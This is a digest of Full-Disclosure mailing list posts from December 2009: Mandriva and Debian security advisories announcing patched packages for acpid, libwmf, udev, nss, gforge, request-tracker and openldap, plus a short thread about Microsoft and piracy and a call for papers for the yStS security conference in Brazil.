gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLF9FmmqjQ0CJFipgRAtsJAJ9whjyazzRhbx/lOrYjboEuwGHg1ACgvL7V P4EHVQLhm2xgrmtDNAakr+g= =xwt6 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:107-1 ] acpid
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:107-1 http://www.mandriva.com/security/ ___ Package : acpid Date: December 3, 2009 Affected: 2008.0 ___ Problem Description: The daemon in acpid before 1.0.10 allows remote attackers to cause a denial of service (CPU consumption and connectivity loss) by opening a large number of UNIX sockets without closing them, which triggers an infinite loop (CVE-2009-0798). The updated packages have been patched to prevent this. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0798 ___ Updated Packages: Mandriva Linux 2008.0: 5f69d7111e4922e03e2af0c9c790c807 2008.0/i586/acpid-1.0.6-1.2mdv2008.0.i586.rpm 965b27578aeba1ee0a6cd17179ab5ee1 2008.0/SRPMS/acpid-1.0.6-1.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 193600a65f75ad4cade617f5e728620d 2008.0/x86_64/acpid-1.0.6-1.2mdv2008.0.x86_64.rpm 965b27578aeba1ee0a6cd17179ab5ee1 2008.0/SRPMS/acpid-1.0.6-1.2mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLF85OmqjQ0CJFipgRAnuyAJ94Oo91sxGRYITeMa/vYuVAOExk/ACeNN0w EB9qQGIQ6UAsIDZCBoNnxfQ= =4xFx -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:106-1 ] libwmf
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:106-1 http://www.mandriva.com/security/ ___ Package : libwmf Date: December 3, 2009 Affected: 2008.0 ___ Problem Description: Use-after-free vulnerability in the embedded GD library in libwmf 0.2.8.4 allows context-dependent attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted WMF file (CVE-2009-1364). The updated packages have been patched to prevent this. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1364 ___ Updated Packages: Mandriva Linux 2008.0: e17c0edd7acbe9bb6cf561aa0b85dc0b 2008.0/i586/libwmf0.2_7-0.2.8.4-14.1mdv2008.0.i586.rpm f9dc9d614f9448d3a1495897b9f21be2 2008.0/i586/libwmf0.2_7-devel-0.2.8.4-14.1mdv2008.0.i586.rpm 3a2f438e80d47d260bd953fd8ccb2451 2008.0/i586/libwmf-0.2.8.4-14.1mdv2008.0.i586.rpm 7b2f877fc6cb4766dbf77719e2750498 2008.0/SRPMS/libwmf-0.2.8.4-14.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 48865d83944f623fb80e5dd2ea43c46d 2008.0/x86_64/lib64wmf0.2_7-0.2.8.4-14.1mdv2008.0.x86_64.rpm 17e8a4121bbb4336d7aeb3ded0c51446 2008.0/x86_64/lib64wmf0.2_7-devel-0.2.8.4-14.1mdv2008.0.x86_64.rpm bc6630356cf5ba7dd6ce7f97f623d034 2008.0/x86_64/libwmf-0.2.8.4-14.1mdv2008.0.x86_64.rpm 7b2f877fc6cb4766dbf77719e2750498 2008.0/SRPMS/libwmf-0.2.8.4-14.1mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLF8xtmqjQ0CJFipgRAvy0AKDU11NRWuuK8xEj0uy7P46Q4zjdagCg3WtC yEAYOkzj/+v2POxlwyI/oP4= =xvCc -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:103-1 ] udev
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:103-1 http://www.mandriva.com/security/ ___ Package : udev Date: December 3, 2009 Affected: 2008.0 ___ Problem Description: Security vulnerabilities have been identified and fixed in udev. udev before 1.4.1 does not verify whether a NETLINK message originates from kernel space, which allows local users to gain privileges by sending a NETLINK message from user space (CVE-2009-1185). Buffer overflow in the util_path_encode function in udev/lib/libudev-util.c in udev before 1.4.1 allows local users to cause a denial of service (service outage) via vectors that trigger a call with crafted arguments (CVE-2009-1186). The updated packages have been patched to prevent this. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1186 ___ Updated Packages: Mandriva Linux 2008.0: 8268a6d9b8b782f008c6bad08081aa1f 2008.0/i586/libvolume_id0-114-7.1mdv2008.0.i586.rpm f25010279ad483a4bd1df3300be1eff5 2008.0/i586/libvolume_id0-devel-114-7.1mdv2008.0.i586.rpm 527afa06fad5b28de6ba60c12c5cc685 2008.0/i586/udev-114-7.1mdv2008.0.i586.rpm b472ccee86044dba507029b63385e306 2008.0/i586/udev-doc-114-7.1mdv2008.0.i586.rpm 33a3aeb9701b9a90b776b08595055f05 2008.0/i586/udev-tools-114-7.1mdv2008.0.i586.rpm b6057c15bb22b381d07ee45a6bc81974 2008.0/SRPMS/udev-114-7.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 8e05d00d129d11f2442390ec7dd4174c 2008.0/x86_64/lib64volume_id0-114-7.1mdv2008.0.x86_64.rpm 2718c04a037f773bca23b010265071ce 2008.0/x86_64/lib64volume_id0-devel-114-7.1mdv2008.0.x86_64.rpm 6756f2bb0dad6dee8188e5dccc1f92cb 2008.0/x86_64/udev-114-7.1mdv2008.0.x86_64.rpm b65a69fde92e29d6affa25d32e881dff 2008.0/x86_64/udev-doc-114-7.1mdv2008.0.x86_64.rpm bf39012f0e457b61fd203711625d78dc 2008.0/x86_64/udev-tools-114-7.1mdv2008.0.x86_64.rpm b6057c15bb22b381d07ee45a6bc81974 2008.0/SRPMS/udev-114-7.1mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLF8RvmqjQ0CJFipgRAp5ZAJ0YBHRyssp4RsoVDk8awKDSM9mnhACgqeEn aP7lY4N3P6dafT+v4TzBfgE= =S27a -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:197-3 ] nss
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:197-3 http://www.mandriva.com/security/ ___ Package : nss Date: December 3, 2009 Affected: 2008.0 ___ Problem Description: Security issues in nss prior to 3.12.3 could lead to a man-in-the-middle attack via a spoofed X.509 certificate (CVE-2009-2408) and md2 algorithm flaws (CVE-2009-2409), and also cause a denial-of-service and possible code execution via a long domain name in X.509 certificate (CVE-2009-2404). This update provides the latest versions of NSS and NSPR libraries which are not vulnerable to those attacks. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2408 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2409 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2404 ___ Updated Packages: Mandriva Linux 2008.0: 6aaa636e2160b8b784904273680a8999 2008.0/i586/libnspr4-4.7.5-0.1mdv2008.0.i586.rpm 87752fe7629a26066b58aaf8e3509ce9 2008.0/i586/libnspr-devel-4.7.5-0.1mdv2008.0.i586.rpm 5950ef5f7750ce69f8505a0d271a654b 2008.0/i586/libnss3-3.12.3.1-0.1mdv2008.0.i586.rpm cb2705cae30e6090947e637d76649cbb 2008.0/i586/libnss-devel-3.12.3.1-0.1mdv2008.0.i586.rpm ceff8722716e8dbada153376cb673239 2008.0/i586/libnss-static-devel-3.12.3.1-0.1mdv2008.0.i586.rpm 666ca07f9d4f5ed6e720f033d77c8a00 2008.0/i586/nss-3.12.3.1-0.1mdv2008.0.i586.rpm 1c6c224afbfff232533e68a4a022ae97 2008.0/SRPMS/nspr-4.7.5-0.1mdv2008.0.src.rpm 33cd024a0584b13ddbe39ae1f7e62d46 2008.0/SRPMS/nss-3.12.3.1-0.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: be078aecd681468224b73c1c8c920bd9 2008.0/x86_64/lib64nspr4-4.7.5-0.1mdv2008.0.x86_64.rpm 41ad25f4383999189cded7c55ed37062 2008.0/x86_64/lib64nspr-devel-4.7.5-0.1mdv2008.0.x86_64.rpm 6e3394c9cf3fc81149907518b9b6707b 2008.0/x86_64/lib64nss3-3.12.3.1-0.1mdv2008.0.x86_64.rpm 90c5234752f41c6d922c02e83031e5be 2008.0/x86_64/lib64nss-devel-3.12.3.1-0.1mdv2008.0.x86_64.rpm 5bff6a89fae610df25a8fb6a95224acd 2008.0/x86_64/lib64nss-static-devel-3.12.3.1-0.1mdv2008.0.x86_64.rpm 18859c654e9f4c3dfcdd90dcf4da551a 2008.0/x86_64/nss-3.12.3.1-0.1mdv2008.0.x86_64.rpm 1c6c224afbfff232533e68a4a022ae97 2008.0/SRPMS/nspr-4.7.5-0.1mdv2008.0.src.rpm 33cd024a0584b13ddbe39ae1f7e62d46 2008.0/SRPMS/nss-3.12.3.1-0.1mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLF64QmqjQ0CJFipgRApgGAJ9TZOgJ09SVNXjOIUwVS+70MDeIswCgw/ER Rv/NKlCK/9Hv4LvLzZclLM0= =KTug -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1945-1] New gforge packages fix denial of service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1945-1 secur...@debian.org http://www.debian.org/security/ Steffen Joeris December 03, 2009 http://www.debian.org/security/faq - Package: gforge Vulnerability : symlink attack Problem type : local Debian-specific: no CVE ID : CVE-2009-3304 Sylvain Beucler discovered that gforge, a collaborative development tool, is prone to a symlink attack, which allows local users to perform a denial of service attack by overwriting arbitrary files. For the stable distribution (lenny), this problem has been fixed in version 4.7~rc2-7lenny3. The oldstable distribution (etch), this problem has been fixed in version 4.5.14-22etch13. For the testing distribution (squeeze), this problem will be fixed soon. For the unstable distribution (sid), this problem has been fixed in version 4.8.2-1. We recommend that you upgrade your gforge packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Debian (oldstable) - -- Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/g/gforge/gforge_4.5.14-22etch13.dsc Size/MD5 checksum: 953 a170b517b1d68ca0ad53a1b8b03c3317 http://security.debian.org/pool/updates/main/g/gforge/gforge_4.5.14.orig.tar.gz Size/MD5 checksum: 2161141 e85f82eff84ee073f80a2a52dd32c8a5 http://security.debian.org/pool/updates/main/g/gforge/gforge_4.5.14-22etch13.diff.gz Size/MD5 checksum: 204328 33081d2f6a0056b31091360db3002a9f Architecture independent packages: http://security.debian.org/pool/updates/main/g/gforge/gforge-shell-ldap_4.5.14-22etch13_all.deb Size/MD5 checksum:86628 c6b62116a819fa905acae8df867d http://security.debian.org/pool/updates/main/g/gforge/gforge-common_4.5.14-22etch13_all.deb Size/MD5 checksum: 1012268 78dfb2931853c3f89d233cc9510199f2 http://security.debian.org/pool/updates/main/g/gforge/gforge-db-postgresql_4.5.14-22etch13_all.deb Size/MD5 checksum: 212786 1bc973b449b07020fbef4519fc8e074e http://security.debian.org/pool/updates/main/g/gforge/gforge-web-apache_4.5.14-22etch13_all.deb Size/MD5 checksum: 705446 286aba34673375cb8763765fd241d791 http://security.debian.org/pool/updates/main/g/gforge/gforge-ftp-proftpd_4.5.14-22etch13_all.deb Size/MD5 checksum:86344 394f14f010e9de88145cc3251e7e8982 http://security.debian.org/pool/updates/main/g/gforge/gforge_4.5.14-22etch13_all.deb Size/MD5 checksum:80562 52133da4596347d8c05e37643a959435 http://security.debian.org/pool/updates/main/g/gforge/gforge-mta-postfix_4.5.14-22etch13_all.deb Size/MD5 checksum:88808 72ad3b9f7d9d1f8732551a99b5e74471 http://security.debian.org/pool/updates/main/g/gforge/gforge-mta-courier_4.5.14-22etch13_all.deb Size/MD5 checksum:76368 c7ba219bac6560994c07dfb639801c99 http://security.debian.org/pool/updates/main/g/gforge/gforge-mta-exim4_4.5.14-22etch13_all.deb Size/MD5 checksum:89414 095ca81a4671193cd5d822e967d36684 http://security.debian.org/pool/updates/main/g/gforge/gforge-shell-postgresql_4.5.14-22etch13_all.deb Size/MD5 checksum:87434 8d960c7671eac2a480a43cd948a98d7d http://security.debian.org/pool/updates/main/g/gforge/gforge-mta-exim_4.5.14-22etch13_all.deb Size/MD5 checksum:88904 8d3692ecc555ca40558d50333bf543a9 http://security.debian.org/pool/updates/main/g/gforge/gforge-lists-mailman_4.5.14-22etch13_all.deb Size/MD5 checksum:82386 3bc6d055f6eb74edfd23ca8dbfb8fa3e http://security.debian.org/pool/updates/main/g/gforge/gforge-ldap-openldap_4.5.14-22etch13_all.deb Size/MD5 checksum:95738 beee5393efe02def8071a78a3707244c http://security.debian.org/pool/updates/main/g/gforge/gforge-dns-bind9_4.5.14-22etch13_all.deb Size/MD5 checksum: 104062 a70e01f8055201519b14718555023abb Debian GNU/Linux 5.0 alias lenny - Debian (stable) - --- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/g/gforge/gforge_4.7~rc2-7lenny3.diff.gz Size/MD5 checksum: 106204 cd0b909a3d
Re: [Full-disclosure] Microsoft: ‘Piracy no long er poses a threat to us’
The big deal for Microsoft are the agreements with Acer/HP/Compaq/Dell etc for the "embedded" OS license and pre-installation. Since Vista the final user is no longer the main Microsoft's target. Plus the top 500 Fortune companies using corporate agreements, the Government Agencies, the International firms. Final user is merely considered, by Microsoft, an extra... On Dec 3, 2009, at 6:24 AM, Ivan . wrote: > In a recent interview, managing director of Microsoft Philippines Inc., John > Bessey, has claimed that piracy no longer poses a threat to the software > giant. > > http://freakbits.com/microsoft-piracy-no-longer-poses-a-threat-to-us-1202 > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1944-1] New request-tracker packages fix session hijack vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1944-1 secur...@debian.org http://www.debian.org/security/ Steffen Joeris December 03, 2009 http://www.debian.org/security/faq - Package: request-tracker3.4/request-tracker3.6 Vulnerability : session hijack Problem type : remote Debian-specific: no CVE Id : CVE-2009-3585 Mikal Gule discovered that request-tracker, an extensible trouble-ticket tracking system, is prone to an attack, where an attacker with access to the same domain can hijack a user's RT session. For the stable distribution (lenny), this problem has been fixed in version 3.6.7-5+lenny3. For the oldstable distribution (etch), this problem has been fixed in version 3.6.1-4+etch1 of request-tracker3.6 and version 3.4.5-2+etch1 of request-tracker3.4. For the testing distribution (squeeze), this problem will be fixed soon. For the unstable distribution (sid), this problem has been fixed in version 3.6.9-2. We recommend that you upgrade your request-tracker packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Debian (oldstable) - -- Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/r/request-tracker3.4/request-tracker3.4_3.4.5-2+etch1.diff.gz Size/MD5 checksum:24450 41891b8a012e671b706facdf4ece3402 http://security.debian.org/pool/updates/main/r/request-tracker3.6/request-tracker3.6_3.6.1-4+etch1.diff.gz Size/MD5 checksum:23488 3c3914d16ad3e719cd502e2490561cc0 http://security.debian.org/pool/updates/main/r/request-tracker3.6/request-tracker3.6_3.6.1-4+etch1.dsc Size/MD5 checksum: 916 c03c1972b5ccab3574f9dfdd3fec0bee http://security.debian.org/pool/updates/main/r/request-tracker3.4/request-tracker3.4_3.4.5-2+etch1.dsc Size/MD5 checksum: 876 5a18cf29db217c6fd2265f6923a938cb http://security.debian.org/pool/updates/main/r/request-tracker3.4/request-tracker3.4_3.4.5.orig.tar.gz Size/MD5 checksum: 1410154 16c8007cba54669e6c9de95cfc680b2a http://security.debian.org/pool/updates/main/r/request-tracker3.6/request-tracker3.6_3.6.1.orig.tar.gz Size/MD5 checksum: 1545708 40c5a828fadaeef9e150255a517d0b17 Architecture independent packages: http://security.debian.org/pool/updates/main/r/request-tracker3.6/rt3.6-apache2_3.6.1-4+etch1_all.deb Size/MD5 checksum: 118264 318517b3d5539a84dee1639710048d92 http://security.debian.org/pool/updates/main/r/request-tracker3.6/rt3.6-apache_3.6.1-4+etch1_all.deb Size/MD5 checksum: 117786 6f3da07edc9499cc282ceed8e71cf26d http://security.debian.org/pool/updates/main/r/request-tracker3.4/rt3.4-clients_3.4.5-2+etch1_all.deb Size/MD5 checksum: 120578 e404452bd2f912820644b26c72de http://security.debian.org/pool/updates/main/r/request-tracker3.4/request-tracker3.4_3.4.5-2+etch1_all.deb Size/MD5 checksum: 1198788 9af1648e53a722155dfd9acaaaf364cd http://security.debian.org/pool/updates/main/r/request-tracker3.4/rt3.4-apache_3.4.5-2+etch1_all.deb Size/MD5 checksum:92002 009fe1090c6142409210f3304f63240d http://security.debian.org/pool/updates/main/r/request-tracker3.6/request-tracker3.6_3.6.1-4+etch1_all.deb Size/MD5 checksum: 1315556 9a06544261bd4b7800ae89065d4f4317 http://security.debian.org/pool/updates/main/r/request-tracker3.6/rt3.6-clients_3.6.1-4+etch1_all.deb Size/MD5 checksum: 146902 8c4a83429ef704025849373a24cf06d5 http://security.debian.org/pool/updates/main/r/request-tracker3.4/rt3.4-apache2_3.4.5-2+etch1_all.deb Size/MD5 checksum:92402 2737f376b27e6c3087dd355e5977edb5 Debian GNU/Linux 5.0 alias lenny - Debian (stable) - --- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/r/request-tracker3.6/request-tracker3.6_3.6.7.orig.tar.gz Size/MD5 checksum: 1764471 46c0b29cd14010ee6a3f181743aeb6ef http://security.debian.org/pool/updates/main/r/request-tracker3.6/request-tracker3.6_3.6.7-5+lenny3.dsc Size/MD5 checksum: 1623 b8a904d8fa89cf4ea78fce2d95d95701 http://security.debi
[Full-disclosure] [SECURITY] [DSA 1943-1] New openldap2.3/openldap packages fix SSL certificate verification weakness
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1943 secur...@debian.org http://www.debian.org/security/ Giuseppe Iuculano December 02, 2009 http://www.debian.org/security/faq - Packages : openldap openldap2.3 Vulnerability : insufficient input validation Problem type : remote Debian-specific: no Debian bug : 553432 CVE ID : CVE-2009-3767 It was discovered that OpenLDAP, a free implementation of the Lightweight Directory Access Protocol, when OpenSSL is used, does not properly handle a '\0' character in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority. For the oldstable distribution (etch), this problem has been fixed in version 2.3.30-5+etch3 for openldap2.3. For the stable distribution (lenny), this problem has been fixed in version 2.4.11-1+lenny1 for openldap. For the testing distribution (squeeze), and the unstable distribution (sid), this problem has been fixed in version 2.4.17-2.1 for openldap. We recommend that you upgrade your openldap2.3/openldap packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/o/openldap2.3/openldap2.3_2.3.30.orig.tar.gz Size/MD5 checksum: 2971126 c40bcc23fa65908b8d7a86a4a6061251 http://security.debian.org/pool/updates/main/o/openldap2.3/openldap2.3_2.3.30-5+etch3.dsc Size/MD5 checksum: 1214 36efc1cf2a98c54d4b1da0910e273843 http://security.debian.org/pool/updates/main/o/openldap2.3/openldap2.3_2.3.30-5+etch3.diff.gz Size/MD5 checksum: 315058 310ce752b78ff3227d78dcd8c1bd60a5 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3-0_2.3.30-5+etch3_alpha.deb Size/MD5 checksum: 293108 2172048d5f8b8b7f379b3414fc5c2e37 http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.30-5+etch3_alpha.deb Size/MD5 checksum: 1280772 ab65f162a40607c1787f9b03783a7563 http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_2.3.30-5+etch3_alpha.deb Size/MD5 checksum: 193768 602a6da790648dd8b0af7d9f386b5c6e amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3-0_2.3.30-5+etch3_amd64.deb Size/MD5 checksum: 285554 42480b47018eb1d70b9e62d05b925a5b http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.30-5+etch3_amd64.deb Size/MD5 checksum: 1244570 b88256f8259516b09c51f166ff6b4aea http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_2.3.30-5+etch3_amd64.deb Size/MD5 checksum: 184652 716cc53985a031d1fe03fede778d6ae5 arm architecture (ARM) http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.30-5+etch3_arm.deb Size/MD5 checksum: 1190314 8686c6a9a9240e6113f92c8bb20d7e1a http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3-0_2.3.30-5+etch3_arm.deb Size/MD5 checksum: 254828 49d9c9a250fb4a5a828de5791ee92380 http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_2.3.30-5+etch3_arm.deb Size/MD5 checksum: 155876 bb45d3104fe4b9811fdb3063da42d3b1 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.30-5+etch3_hppa.deb Size/MD5 checksum: 1307146 698d7416e4cc544522ce2e25ac9c0fce http://security.debian.org/pool/updates/main/o/openldap2.3/libldap-2.3-0_2.3.30-5+etch3_hppa.deb Size/MD5 checksum: 292798 eb9d6d19560a1153cc58ccae3f354a4e http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_2.3.30-5+etch3_hppa.deb Size/MD5 checksum: 182568 caade74265ee9d7b8ac77c844c23b413 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/o/openldap2.3/slapd_2.3.30-5+etch3_i386.deb Size/MD5 checksum: 1177552 f3ccf11b82474593af5e30a272f9edb9 http://security.debian.org/pool/updates/main/o/openldap2.3/ldap-utils_2.3.30-5+etch3_i386.deb Size/MD5 checksum: 148744 168e58797e74f9b3b6d3c337b6369ca7 http://security.debian.org/pool/updates/main/o/open
[Full-disclosure] Call for Papers - you Sh0t the Sheriff 4 - Security Conference, Brazil
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hello Full-Disclosure, The call for papers for the yStS (you Sh0t the Sheriff) conference is now open! The 4th edition will be, once again, held in Sao Paulo, Brazil, on May 17th, 2010. INTRODUCTION you sh0t the Sheriff is a very unique event dedicated to bringing cutting edge topics to the top-notch Information Security Community in Brazil. yStS mixes the highest quality presentations and speakers from all over the globe, covering diverse topics in information security. Our goal is to help attendees understand the current state of the information security world by mixing professionals and topics from different Infosec segments of the market. For the most part, yStS is an invite-only event. So, submitting a talk is certainly a good hack to try to be there, especially if you're local. Due to the success of previous years' editions, yes, we're keeping the same format: * Kicked-back and cool environment * YSTS 4 will be held at an almost secret location (only announced to whom it may concern a couple of weeks before the con) * and, once again, this secret location will be, most likely, a club or a bar * and yes, we have (some) food and (lots of) drinks CONFERENCE TOPICS The focus for YSTS 4 is anything related to InfoSec, including (but not limited to): * Operating Systems * Career and Management topics * Mobile Devices/Embedded Systems * Information Security Audit and Control * Social Networking * Information Security Policies * Messing with Protocols * Networking/Telecommunication * Wireless and all RF related stuff * Incident Response & other applicable (and useful) Infosec Policies * Information Warfare * Malware/ BotNets * User awareness/ Social Networking Threats * Secure Programming * Hacker Spaces/ hacker community * Fuzzing * Physical Security * Virtualization * Webapp Security * "the" Cloud * Cryptography / Obfuscation * Infrastructure and Critical Systems * Caipirinha and Beer Hacks * and everything else security related you might think would be good for the conference We do like shorter talks, so, please submit your talks and remember they must be 30 minutes long. The new thing for this year is that we also are opened to some 15-minute talks. Some of the smart people around might not need 30 minutes to deliver a message, or it might be a project that has been just kicked-off. 15 minutes might be your thing and that's nothing to be ashamed about. you Sh0t the Sheriff is the perfect conference to release your new projects, trust us. And yes, we do prefer new stuff and "first-time" speakers are more than welcome. If you got good stuff to speak about, that's all that matters. SPEAKER PRIVILEGES (applies only to the 30 minute-long talks) * USD 1,000.00 to help covering travel expenses for international speakers * Breakfast, lunch and dinner during conference * After-conference official party (and the unofficial ones) * Auditing products in traditional Brazilian barbecue restaurants * Life-time free admission for all future yStS conferences (yes, if you 've spoken before at yStS, you have your free-entry guaranteed, just buy us a beer, ohh, wait, it's free anyways, isn't it?) CFP SUBMISSION Each paper submission must include the following information: * Name, title, address, email and phone/contact number * Short biography and qualification * Speaking experience * Do you need or have a visa to come to Brasil? * Summary or abstract for your presentation * is it a 30 minute or a 15 minute talk? * Technical requirements (others than LCD Projector) * Other publications or conferences where this material has been or will be published/submitted. We do accept submissions in English, Portuguese or Spanish. IMPORTANT DATES Final CFP Submission - February 28th, 2010 Final Notification of Acceptance - March 20th, 2010 Final Material Submission for accepted presentations - May 5th, 2010 Please send your talk submission to cfp/at/ysts.org CONTACT INFORMATION Paper Submissions: cfp/at/ysts.org General Inquiries: b0ard/at/ysts.org Sponsorship Inquiries:sponsors/at/ysts.org OTHER STUFF Check our archives session, including the videos, at www.ysts.org We hope to see you there! Luiz Eduardo & Nelson Murilo & Willian Caprino http://www.ysts.org -BEGIN PGP SIGNATURE- Version: PGP Desktop 9.8.3 (Build 4028) Charset: utf-8 